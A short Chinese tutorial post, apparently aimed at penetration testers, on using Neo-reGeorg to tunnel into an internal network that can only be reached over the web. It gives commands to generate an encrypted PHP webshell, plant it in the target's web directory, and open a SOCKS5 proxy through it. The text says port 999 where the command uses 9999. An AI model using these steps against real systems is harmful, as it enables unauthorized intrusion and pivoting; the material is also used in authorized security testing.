在主机只能通过web访问而内部完全不出网的时候,我们一般可以通过使用上传http代理脚本代理出来,让我们实现对内网的探测。 一般常用的隧道就是reGeorg,这个工具在aspx和jsp环境下都没毛病,但是在php环境tunnel.php文件要依赖dl("php_sockets.dll");通过dl函数加载扩展,这种方式局限性很大,很多环境下都不支持dl函数。 所以项目下提供了tunnel.nosocket.php文件,可以不依赖与dl函数。但是其中还是使用了flush()这个函数,但是这个还是同样也不是在所有的PHP环境中都可以正常工作的,比如在我们最长使用的phpstudy中就不行,所以原生的reGeorg的php隧道基本上是残废的。 现在终于已经有大佬在reGeorg的基础上,做了重构。完成了Neo-reGeorg,加入了reGeorg没有的很多新特性,比如说加密伪装等等。最重要的是php兼容的问题修复了,可以在大部分环境下完成php的隧道。 https://github.com/L-codes/Neo-reGeorg 以phpstudy环境为演示: 生成webshell python neoreg.py generate -k password 生成的php文件放到web目录下 在本地999端口开启socks5代理 python3 neoreg.py -k password -u http://10.211.55.11/tunnel.php -p 9999 文章来源:Biaofun标梵互动(https://www./) |
|